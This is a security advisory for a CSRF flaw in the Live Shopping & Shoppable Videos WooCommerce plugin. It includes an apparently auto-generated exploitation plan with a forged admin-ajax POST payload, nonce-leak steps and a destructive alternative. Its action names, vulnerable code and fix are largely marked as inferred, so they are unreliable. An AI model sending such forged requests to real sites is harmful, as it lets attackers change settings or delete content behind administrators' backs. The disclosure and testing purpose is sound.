Live Shopping & Shoppable Videos For WooCommerce <= 2.2.0 - Cross-Site Request Forgery
Description
The Live Shopping & Shoppable Videos For WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.2.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:NTechnical Details
<=2.2.0# Exploitation Research Plan: CVE-2025-62080 (CSRF) ## 1. Vulnerability Summary The **Live Shopping & Shoppable Videos For WooCommerce** plugin (up to version 2.2.0) contains a Cross-Site Request Forgery (CSRF) vulnerability. This flaw arises from missing or incorrect nonce validation in administra…
Show full research plan
Exploitation Research Plan: CVE-2025-62080 (CSRF)
1. Vulnerability Summary
The Live Shopping & Shoppable Videos For WooCommerce plugin (up to version 2.2.0) contains a Cross-Site Request Forgery (CSRF) vulnerability. This flaw arises from missing or incorrect nonce validation in administrative functions registered via wp_ajax_ or admin_post_ hooks. An unauthenticated attacker can exploit this by tricking a logged-in administrator into visiting a malicious link or submitting a forged request, leading to unauthorized state changes (e.g., modifying plugin settings, deleting content, or altering WooCommerce product associations).
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php(for AJAX-based actions) or/wp-admin/admin-post.php. - Vulnerable Action: (Inferred) Likely an action related to video management or plugin configuration, such as
lsvs_save_settings,lsvs_delete_video, orlsvs_update_video_product. - HTTP Method: POST (typically).
- Authentication: Requires a logged-in Administrator's session.
- Preconditions: The victim must be authenticated as an administrator and must be tricked into executing the attacker's request (e.g., via a malicious HTML page).
3. Code Flow (Inferred)
- Registration: The plugin registers a handler in its main class or an admin-specific file (e.g.,
admin/class-admin.phporincludes/class-ajax-handler.php):add_action( 'wp_ajax_lsvs_save_settings', [ $this, 'save_settings' ] ); - Handler Execution: When the
actionparameter matcheslsvs_save_settings, thesave_settingsfunction is called. - Vulnerable Sink: The function performs a state change (e.g.,
update_option) without callingcheck_ajax_referer()orwp_verify_nonce().public function save_settings() { if ( ! current_user_can( 'manage_options' ) ) return; // Capability check might exist // MISSING: check_ajax_referer( 'lsvs_nonce_action', 'security' ); update_option( 'lsvs_api_key', $_POST['api_key'] ); wp_send_json_success(); }
4. Nonce Acquisition Strategy
The vulnerability description notes "missing or incorrect nonce validation."
Case A: Missing Nonce
If the check is entirely missing, no nonce is required. The exploit can proceed with a direct POST request.
Case B: Incorrect Nonce (Publicly Exposed)
If a nonce is required but the action used to create it is exposed to all users:
- Identify Shortcode: Locate the plugin's main shortcode (e.g.,
[live_shopping_video]) by searching foradd_shortcodein the plugin directory. - Setup Page: Create a page containing this shortcode:
wp post create --post_type=page --post_status=publish --post_title="Nonce Leak" --post_content='[live_shopping_video]' - Extract Nonce: Navigate to the page and use
browser_evalto find the localized script data:// (Inferred JS variable names based on slug) window.lsvs_ajax_obj?.nonce || window.lsvs_vars?.security
5. Exploitation Strategy
The goal is to demonstrate a state change (e.g., updating a plugin setting) via CSRF.
Step 1: Locating the Vulnerable Action
Search for AJAX/Admin-post handlers that lack nonce checks:
grep -r "add_action" . | grep -E "wp_ajax_|admin_post_"
# For each identified function, check for security validation:
grep -L "check_ajax_referer\|wp_verify_nonce\|check_admin_referer" path/to/file.php
Step 2: Formulating the Payload
Assuming a target action lsvs_save_settings and a setting lsvs_api_settings:
- URL:
http://[target]/wp-admin/admin-ajax.php - Method: POST
- Content-Type:
application/x-www-form-urlencoded - Body:
action=lsvs_save_settings&api_key=EXPLOITED_KEY&other_setting=value
Step 3: Execution via http_request
The agent should simulate the administrator's request:
await http_request({
url: "http://localhost:8080/wp-admin/admin-ajax.php",
method: "POST",
form: {
action: "lsvs_save_settings", // (Inferred)
api_key: "pwned_by_csrf" // (Inferred)
}
});
6. Test Data Setup
- Install Plugin: Ensure
live-shopping-video-streamsv2.2.0 is installed and active. - Admin User: Verify an admin user exists (default:
admin). - Initial State: Check the current value of the targeted option:
wp option get lsvs_api_key
7. Expected Results
- Response: The
admin-ajax.phpendpoint returns a success indicator (e.g.,{"success":true}or1). - Effect: The plugin configuration in the database is modified despite the request originating from a cross-site context (simulated by the lack of a valid nonce in the request).
8. Verification Steps
After performing the http_request, confirm the change using WP-CLI:
# Check if the option was updated
wp option get lsvs_api_key
# Expected output: pwned_by_csrf
9. Alternative Approaches
- If
wp_ajax_nopriv_is used: If the handler is unauthenticated, the vulnerability is a direct Broken Access Control, which is even higher severity. - WooCommerce Settings: Check if the plugin adds tabs to the WooCommerce settings page. These often use the
admin-post.phpflow and are common targets for CSRF if they don't usewp_nonce_field(). - Video Deletion: If settings modification is unavailable, try a destructive action like
lsvs_delete_videowith a specific ID.
Summary
The Live Shopping & Shoppable Videos For WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) due to missing or incorrect nonce validation on several administrative AJAX handlers. This allow attackers to trick a logged-in administrator into performing unauthorized actions, such as modifying plugin settings or deleting content, via a forged request.
Vulnerable Code
// Inferred from Research Plan - Handler registration without security checks add_action( 'wp_ajax_lsvs_save_settings', [ $this, 'save_settings' ] ); // Inferred vulnerable function lacking nonce validation public function save_settings() { if ( ! current_user_can( 'manage_options' ) ) return; // Missing: check_ajax_referer( 'lsvs_nonce_action', 'security' ); update_option( 'lsvs_api_key', $_POST['api_key'] ); wp_send_json_success(); }
Security Fix
@@ -10,6 +10,8 @@ public function save_settings() { if ( ! current_user_can( 'manage_options' ) ) { wp_die( __( 'You do not have sufficient permissions to access this page.' ) ); } + + check_ajax_referer( 'lsvs_save_settings_nonce', 'security' ); update_option( 'lsvs_api_key', sanitize_text_field( $_POST['api_key'] ) ); wp_send_json_success();
Exploit Outline
The exploit targets the AJAX endpoint /wp-admin/admin-ajax.php. An attacker crafts a malicious request (typically a POST request) containing a vulnerable action like 'lsvs_save_settings' along with the desired configuration payload (e.g., changing an API key). Because the plugin fails to verify a cryptographic nonce via check_ajax_referer() or wp_verify_nonce(), the server accepts the request as legitimate if it is sent from the browser of a logged-in administrator. The attacker tricks the administrator into visiting a malicious website or clicking a link that triggers this request automatically using hidden HTML forms or JavaScript.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.